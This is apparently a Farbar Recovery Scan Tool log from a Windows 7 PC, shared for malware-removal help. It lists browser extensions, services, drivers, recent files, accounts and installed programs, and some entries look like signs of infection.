FF Extension: (MEGA) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2018-10-18]
FF Extension: (Hush - private bookmarking) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2017-09-21] [Legacy]
FF Extension: (YouTube mp3) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2017-10-11] [Legacy]
FF Extension: (Double-click Image Downloader) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2018-05-16]
FF Extension: (SafeBrowse) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2016-11-13] [Legacy]
FF Extension: (Google Translator for Firefox) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2018-10-14]
FF Extension: (Complemento inhabilitación Google Analytics) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\{6d96bb5e-1175-4ebf-8ab5-5f56f1c79f65}.xpi [2018-06-06]
FF Extension: (Password Exporter) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\{B17C1C5A-04B1-11DB-9804-B622A1EF5492}.xpi [2017-07-30] [Legacy]
FF Extension: (Adblock Plus) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2018-08-30]
FF Extension: (Telemetry coverage) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\features\{27814f4c-86e6-4100-afda-17ffdc795c99}\[email protected] [2018-10-10] [Legacy]
FF HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2017-04-25]
FF HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-01-26] [Legacy]
FF HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\Dango\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Dango\AppData\Roaming\IDM\idmmzcc5 [2017-05-02] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_31_0_0_122.dll [2018-10-09] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_31_0_0_122.dll [2018-10-09] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-04] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 10\npnitromozilla.dll [2016-03-03] (Nitro PDF)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-03-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-03-23] (NVIDIA Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-01-20] (VideoLAN)

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-04-27]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-04-27]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
S2 AxAutoMntSrv; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [75624 2012-01-05] (Alcohol Soft Development Team)
R2 ewserver; C:\Program Files\SolidWorks Corp\SolidWorks Electrical\server\EwServer.exe [193024 2014-03-31] (Trace Software International) [File not signed]
R2 IISADMIN; C:\Windows\system32\inetsrv\inetinfo.exe [15872 2010-11-20] (Microsoft Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6347056 2018-09-19] (Malwarebytes)
R2 MSMQTriggers; C:\Windows\system32\mqtgsvc.exe [189440 2010-11-20] (Microsoft Corporation)
S2 MSSQL$TEW_SQLEXPRESS; C:\ProgramData\SolidWorks Electrical\MSSQL11.TEW_SQLEXPRESS\MSSQL\Binn\sqlservr.exe [191064 2012-02-11] (Microsoft Corporation)
R2 NitroDriverReadSpool10; C:\Program Files\Nitro\Pro 10\NitroPDFDriverService10x64.exe [327320 2016-03-03] (Nitro PDF Software)
R2 NitroUpdateService; C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe [417944 2016-03-03] ()
S3 PAExec; C:\Windows\PAExec.exe [189112 2017-08-04] (Power Admin LLC)
S4 RemoteSolverDispatcher; C:\Program Files\SolidWorks Corp\SolidWorks Flow Simulation\binCFW\remotesolverdispatcherservice.exe [235656 2014-03-31] (Mentor Graphics Corporation) [File not signed]
S3 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2016-03-08] (SolidWorks) [File not signed]
S4 SQLAgent$TEW_SQLEXPRESS; C:\ProgramData\SolidWorks Electrical\MSSQL11.TEW_SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [597080 2012-02-11] (Microsoft Corporation)
R2 StarWindServiceAE; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [370688 2009-12-23] (StarWind Software) [File not signed]
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesService64.exe [2145080 2015-06-25] (TuneUp Software)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 WlanWpsSvc; C:\Program Files\802.11 Wireless LAN\802.11n Wireless USB Adapter HW.17\WlanWpsSvc.exe [167936 2008-02-13] () [File not signed]
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 CisUtMonitor; C:\Windows\System32\DRIVERS\CisUtMonitor.sys [33360 2011-10-30] (CrystalIdea Software)
S3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2018-09-24] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2018-09-24] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-15] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-15] (SlySoft, Inc.)
R1 HWiNFO; C:\Windows\system32\drivers\HWiNFO64A.SYS [55960 2018-06-02] (REALiX(tm))
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [200232 2018-10-17] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [260384 2018-10-18] (Malwarebytes)
S4 RsFx0200; C:\Windows\System32\DRIVERS\RsFx0200.sys [334936 2012-02-11] (Microsoft Corporation)
R3 rtl819xpn64; C:\Windows\System32\DRIVERS\rtl819xp.sys [622624 2010-02-01] (Realtek Semiconductor Corporation )
S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [11616 2001-08-30] () [File not signed]
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [564824 2016-02-22] (Duplex Secure Ltd.)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesDriver64.sys [31144 2015-06-04] (TuneUp Software)
U3 ai14l3mj; C:\Windows\System32\Drivers\ai14l3mj.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U0 aswVmm; no ImagePath
S2 npf; \??\C:\Windows\system32\drivers\npf.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-18 13:43 - 2018-10-18 13:43 - 000018304 _____ C:\Users\Dango\Desktop\FRST.txt
2018-10-18 13:43 - 2018-10-18 13:43 - 000000000 ____D C:\FRST
2018-10-18 13:41 - 2018-10-18 13:41 - 002414592 _____ (Farbar) C:\Users\Dango\Desktop\FRST64.exe
2018-10-18 13:04 - 2018-10-18 13:04 - 000260384 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-10-18 10:34 - 2018-10-18 12:54 - 000000000 ____D C:\Users\Dango\AppData\Roaming\Package Cache
2018-10-17 23:11 - 2018-10-18 10:46 - 000000866 _____ C:\Users\Public\Desktop\CCleaner.lnk
2018-10-17 23:11 - 2018-10-17 23:11 - 000003870 _____ C:\Windows\System32\Tasks\CCleaner Update
2018-10-17 23:11 - 2018-10-17 23:11 - 000002790 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2018-10-17 23:11 - 2018-10-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2018-10-17 23:11 - 2018-10-17 23:11 - 000000000 ____D C:\Program Files\CCleaner
2018-10-17 23:10 - 2018-10-17 23:10 - 000001375 _____ C:\Users\Dango\Desktop\AdwCleaner[S01].txt
2018-10-17 22:59 - 2018-10-17 23:03 - 000010556 _____ C:\Users\Dango\Desktop\registro malware.txt
2018-10-17 12:41 - 2018-10-18 10:46 - 000001911 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-10-17 12:41 - 2018-10-17 12:41 - 000200232 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2018-10-17 12:41 - 2018-10-17 12:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-10-17 12:41 - 2018-09-11 13:18 - 000152688 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2018-10-16 10:47 - 2018-10-16 11:33 - 000000000 ____D C:\Users\Dango\AppData\LocalLow\uTorrent
2018-10-15 09:04 - 2018-10-17 12:24 - 000000000 ____D C:\Users\Dango\AppData\Roaming\AppDataFiles
2018-10-14 20:52 - 2018-10-14 20:52 - 002505630 _____ C:\Users\Dango\Desktop\David Copperfield.pdf
2018-10-13 15:04 - 2018-10-14 21:24 - 000000000 ____D C:\Windows\Joomla Standart
2018-10-11 10:28 - 2018-10-11 10:28 - 000000000 ____D C:\Program Files (x86)\Benchmarks
2018-10-11 10:08 - 2018-10-11 10:08 - 000002421 _____ C:\Users\Dango\Desktop\lis.txt
2018-10-11 09:59 - 2018-10-11 10:00 - 000000000 ____D C:\Users\Dango\Desktop\Nueva carpeta
2018-10-10 13:49 - 2018-10-12 12:51 - 000000729 _____ C:\Users\Dango\Desktop\guarapo competencia.txt
2018-10-07 12:42 - 2018-10-07 12:42 - 000000000 ____D C:\Users\Dango\AppData\LocalLow\Snowhound
2018-10-07 12:28 - 2017-04-27 17:50 - 003550208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
2018-10-07 12:28 - 2017-04-12 08:05 - 004296704 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2018-10-07 12:20 - 2018-10-07 12:36 - 000000819 _____ C:\Users\Public\Desktop\Deep Sky Derelicts.lnk
2018-10-07 12:20 - 2018-10-07 12:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deep Sky Derelicts
2018-10-04 22:04 - 2018-10-04 22:04 - 000000306 _____ C:\Windows\Tasks\AdwCleaner_onReboot.job
2018-10-04 21:49 - 2018-10-04 21:49 - 000000000 ____D C:\Users\Dango\AppData\Local\mbam
2018-10-04 21:48 - 2018-10-17 12:41 - 000000000 ____D C:\Program Files\Malwarebytes
2018-10-04 21:48 - 2018-10-04 21:48 - 000000000 ____D C:\Users\Dango\AppData\Local\mbamtray
2018-10-04 21:27 - 2018-10-04 22:04 - 000000000 ____D C:\AdwCleaner
2018-10-04 11:44 - 2018-10-08 10:48 - 000003726 _____ C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}
2018-10-04 11:44 - 2018-10-05 09:13 - 000003436 _____ C:\Windows\System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B}
2018-10-04 11:44 - 2018-10-04 11:44 - 000003562 _____ C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}
2018-10-04 11:44 - 2018-10-04 11:44 - 000000002 _____ C:\Users\Dango\AppData\Local\imw.ini
2018-09-26 20:22 - 2018-09-27 20:26 - 000000510 _____ C:\Users\Dango\Desktop\competencia mixologia.txt
2018-09-25 21:57 - 2018-09-25 21:57 - 000000210 _____ C:\Users\Dango\Desktop\aaaaa.txt
2018-09-24 15:07 - 2018-10-14 10:24 - 000000000 ____D C:\Users\Dango\Desktop\Vah 11
2018-09-24 11:17 - 2018-09-24 11:17 - 000000000 ____D C:\Users\Dango\AppData\Local\Focus Home Interactive
2018-09-24 11:12 - 2018-09-24 11:12 - 000001086 _____ C:\Users\Dango\Desktop\Cities XL Platinum.lnk
2018-09-24 11:12 - 2018-09-24 11:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\(Default)
2018-09-24 11:10 - 2018-09-24 11:12 - 000000000 ____D C:\Program Files (x86)\Cities XL Platinum
2018-09-24 10:38 - 2018-09-24 10:38 - 000000000 ____D C:\Windows\System32\Tasks\AVG
2018-09-24 10:37 - 2018-09-24 10:37 - 000000000 ____D C:\Program Files\Common Files\AVG
2018-09-24 10:35 - 2018-09-24 10:35 - 000000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2018-09-24 10:35 - 2018-09-24 10:35 - 000000000 ____D C:\Users\Public\Documents\Catch!
2018-09-24 10:35 - 2018-09-24 10:35 - 000000000 ____D C:\Users\Dango\AppData\Local\Disc_Soft_Ltd
2018-09-24 10:34 - 2018-09-24 10:34 - 000047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2018-09-24 10:33 - 2018-09-24 13:41 - 000000000 ____D C:\Users\Dango\AppData\Local\WallpaperSuite
2018-09-24 10:33 - 2018-09-24 13:41 - 000000000 ____D C:\Program Files\DAEMON Tools Lite
2018-09-24 10:33 - 2018-09-24 10:35 - 000000000 ____D C:\Users\Dango\AppData\Roaming\DAEMON Tools Lite
2018-09-24 10:33 - 2018-09-24 10:33 - 000030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2018-09-24 10:33 - 2018-09-24 10:33 - 000000000 ____D C:\ProgramData\DAEMON Tools Lite

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-18 13:44 - 2016-11-18 18:24 - 000000000 ____D C:\Users\Dango\AppData\LocalLow\Mozilla
2018-10-18 13:43 - 2017-05-02 19:02 - 000000000 ____D C:\Users\Dango\AppData\Roaming\IDM
2018-10-18 13:43 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\inf
2018-10-18 13:42 - 2016-02-22 17:04 - 000000000 ____D C:\Users\Dango\AppData\Roaming\DMCache
2018-10-18 13:12 - 2009-07-13 23:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-10-18 13:12 - 2009-07-13 23:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-10-18 13:08 - 2018-02-22 21:36 - 000000388 _____ C:\Windows\Tasks\update-S-1-5-21-4162917515-3570797744-2880415204-1000.job
2018-10-18 13:06 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\system32\inetsrv
2018-10-18 13:04 - 2017-08-04 11:33 - 000000000 ____D C:\ProgramData\NVIDIA
2018-10-18 13:04 - 2009-07-14 00:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-10-18 12:31 - 2016-02-22 17:39 - 000000000 ____D C:\Users\Dango\AppData\Roaming\vlc
2018-10-18 11:13 - 2017-03-17 21:25 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-10-17 23:04 - 2017-02-11 11:11 - 000000000 ____D C:\Users\Dango\AppData\Roaming\Notepad++
2018-10-17 12:41 - 2016-02-22 20:31 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-10-17 10:04 - 2018-02-22 21:36 - 000000388 _____ C:\Windows\Tasks\update-sys.job
2018-10-16 22:56 - 2017-02-21 17:24 - 000000000 ____D C:\Program Files (x86)\Voobly
2018-10-16 22:55 - 2016-09-13 20:52 - 000000000 ____D C:\Users\Dango\AppData\Roaming\.minecraft
2018-10-16 19:02 - 2016-02-22 18:42 - 000000000 ____D C:\Users\Dango\AppData\Roaming\uTorrent
2018-10-15 10:23 - 2016-04-22 11:24 - 000000000 ____D C:\Users\Dango\Desktop\Locale.Emulator.2.1.1.0
2018-10-15 10:23 - 2016-02-22 10:32 - 000000000 ____D C:\Users\Dango\AppData\Local\ElevatedDiagnostics
2018-10-15 09:00 - 2009-07-14 00:08 - 000032636 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2018-10-14 11:04 - 2016-03-08 17:33 - 000000000 ____D C:\Users\Public\Documents\shared mcamx5
2018-10-14 11:04 - 2016-03-08 17:33 - 000000000 ____D C:\Program Files (x86)\mcamx5
2018-10-13 19:34 - 2016-02-22 14:55 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2018-10-13 14:38 - 2016-06-05 14:35 - 000003704 _____ C:\Windows\System32\Tasks\Java Platform SE Auto Updater
2018-10-12 17:09 - 2016-02-22 17:44 - 000000000 ____D C:\Users\Dango\AppData\Roaming\Nitro
2018-10-10 10:42 - 2017-03-03 16:16 - 000000000 ____D C:\Users\Dango\AppData\Local\CrashDumps
2018-10-09 16:44 - 2018-03-13 21:44 - 000004492 _____ C:\Windows\System32\Tasks\Adobe Flash Player NPAPI Notifier
2018-10-09 16:44 - 2016-02-22 14:55 - 000842240 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-10-09 16:44 - 2016-02-22 14:55 - 000175104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2018-10-09 16:44 - 2016-02-22 14:55 - 000004320 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2018-10-09 16:44 - 2016-02-22 14:55 - 000000000 ____D C:\Windows\system32\Macromed
2018-10-07 12:29 - 2016-02-22 15:23 - 000530808 _____ C:\Windows\system32\perfh011.dat
2018-10-07 12:29 - 2016-02-22 15:23 - 000177520 _____ C:\Windows\system32\perfc011.dat
2018-10-07 12:29 - 2016-02-22 13:09 - 002794022 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2018-10-07 12:29 - 2011-04-12 04:10 - 000908374 _____ C:\Windows\system32\perfh00A.dat
2018-10-07 12:29 - 2011-04-12 04:10 - 000223466 _____ C:\Windows\system32\perfc00A.dat
2018-10-07 12:29 - 2009-07-14 00:13 - 002794022 _____ C:\Windows\system32\PerfStringBackup.INI
2018-10-07 12:21 - 2016-02-22 15:10 - 000000000 ____D C:\ProgramData\Package Cache
2018-10-07 12:20 - 2016-02-29 12:51 - 000000000 ____D C:\Windows\SysWOW64\directx
2018-10-04 22:19 - 2018-06-04 22:49 - 000000000 ____D C:\Users\Dango\Desktop\01 Rutine Malwarebytes
2018-10-04 21:57 - 2018-02-25 10:22 - 000000000 ____D C:\Program Files (x86)\Cheat Engine 6.3
2018-10-04 11:44 - 2016-02-22 07:49 - 000000000 ____D C:\Users\Dango
2018-09-28 14:32 - 2018-06-09 20:44 - 000000000 ____D C:\Users\Dango\Desktop\Firefox Pass
2018-09-24 20:13 - 2017-12-07 20:08 - 000000000 ____D C:\zseed
2018-09-24 13:15 - 2016-02-22 20:06 - 000000000 ____D C:\ProgramData\Avg
2018-09-24 13:15 - 2016-02-22 20:05 - 000000000 ____D C:\Users\Dango\AppData\Local\Avg
2018-09-24 11:54 - 2016-10-17 20:42 - 000000000 ____D C:\Users\Dango\Desktop\emplatados

==================== Files in the root of some directories =======

2009-07-13 20:14 - 2009-07-13 20:14 - 000073216 ____N (Microsoft Corporation) C:\Users\Dango\noiSziUSYyUv.exe
2013-02-26 01:28 - 2013-02-26 01:28 - 000027762 _____ () C:\Program Files (x86)\changes.txt
2009-07-13 20:14 - 2009-07-13 20:14 - 000186368 ____N (Microsoft Corporation) C:\Program Files (x86)\fKPUoytri.exe
2013-02-26 01:34 - 2013-02-26 01:34 - 002547384 _____ (Beepa P/L) C:\Program Files (x86)\fraps.exe
2013-02-26 01:34 - 2013-02-26 01:34 - 000234168 _____ (Beepa P/L) C:\Program Files (x86)\fraps32.dll
2013-02-26 01:34 - 2013-02-26 01:34 - 000068792 _____ (Beepa P/L) C:\Program Files (x86)\fraps64.dat
2013-02-26 01:34 - 2013-02-26 01:34 - 000186552 _____ (Beepa P/L) C:\Program Files (x86)\fraps64.dll
2013-02-26 01:30 - 2013-02-26 01:30 - 000140288 _____ (Beepa P/L) C:\Program Files (x86)\frapslcd.dll
2013-02-26 01:27 - 2013-02-26 01:27 - 000001894 _____ () C:\Program Files (x86)\README.HTM
2018-02-22 21:47 - 2018-02-22 21:47 - 000040446 _____ (Beepa Pty Ltd) C:\Program Files (x86)\uninstall.exe
2009-07-13 20:14 - 2009-07-13 20:14 - 000073216 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\aOTSAwA.exe
2016-09-11 18:26 - 2016-09-11 18:26 - 000000046 _____ () C:\Users\Dango\AppData\Roaming\WB.CFG
2018-10-04 11:44 - 2018-10-04 11:44 - 000000002 _____ () C:\Users\Dango\AppData\Local\imw.ini
2016-03-08 22:01 - 2016-08-08 21:44 - 000000000 _____ () C:\Users\Dango\AppData\Local\Temptable.xml
2018-02-22 21:36 - 2018-02-22 21:36 - 000000003 _____ () C:\Users\Dango\AppData\Local\updater.log
2018-02-22 21:36 - 2018-04-01 18:16 - 000000059 _____ () C:\Users\Dango\AppData\Local\UserProducts.xml

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-10-16 18:33

==================== End of FRST.txt ============================

#10

Addition:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10.10.2018
Ran by Dango (18-10-2018 13:44:07)
Running from C:\Users\Dango\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2016-02-22 12:49:41)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-4162917515-3570797744-2880415204-500 - Administrator - Disabled)
Dango (S-1-5-21-4162917515-3570797744-2880415204-1000 - Administrator - Enabled) => C:\Users\Dango
HomeGroupUser$ (S-1-5-21-4162917515-3570797744-2880415204-1002 - Limited - Enabled)
Invitado (S-1-5-21-4162917515-3570797744-2880415204-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\uTorrent) (Version: 3.5.4.44632 - BitTorrent Inc.)
802.11n Wireless USB Adapter HW.17 (HKLM-x32\...\{0CC1ED93-1D13-4127-B1A6-2DDC0D7EBE74}) (Version: 1.00.0000 - CAMEO)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 25.0.0.134 - Adobe Systems Incorporated)
Adobe Flash Player 31 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Adobe Flash Player 31 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Age of Empires II HD The Rise of the Rajas (HKLM\...\YWdlb2ZlbXBpcmVzaWloZA_is1) (Version: 1 - )
Apple Application Support (32 bits) (HKLM-x32\...\{9BA1A894-B42F-4805-BC8C-349C905A3930}) (Version: 5.3.1 - Apple Inc.)
Apple Application Support (64 bits) (HKLM\...\{7EAC8A42-9FAC-4F6B-AABF-C08C9F2E0F13}) (Version: 5.3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
CCleaner (HKLM\...\CCleaner) (Version: 5.47 - Piriform)
Cheat Engine 6.3 (HKLM-x32\...\Cheat Engine 6.3_is1) (Version:  - Cheat Engine)
Cities XL Platinum version 1.00 (HKLM-x32\...\Cities XL Platinum_is1) (Version: 1.00 - )
CloneCD (HKLM-x32\...\CloneCD) (Version:  - SlySoft)
CodeBlocks (HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\CodeBlocks) (Version: 16.01 - The Code::Blocks Team)
Core Temp 1.12.1 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.12.1 - ALCPU)
CrystalDiskInfo 7.7.0 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 7.7.0 - Crystal Dew World)
Deep Sky Derelicts MULTi7 - ElAmigos versión 1.0.3 (HKLM-x32\...\{A878A899-B506-47F0-A74E-2C591FE06A6D}_is1) (Version: 1.0.3 - 1C Company)
Defraggler (HKLM\...\Defraggler) (Version: 2.21 - Piriform)
Desinstalación de CopyTrans Suite solamente (HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\CopyTrans Suite) (Version: 4.013 - WindSolutions)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 391.35 - NVIDIA Corporation) Hidden
DUNGEON OF REGALIAS (HKLM-x32\...\{DBB5DBBF-5D9C-45C5-B235-86F386677CE3}) (Version: 1.00.0000 - 株式会社アルカディアワークス)
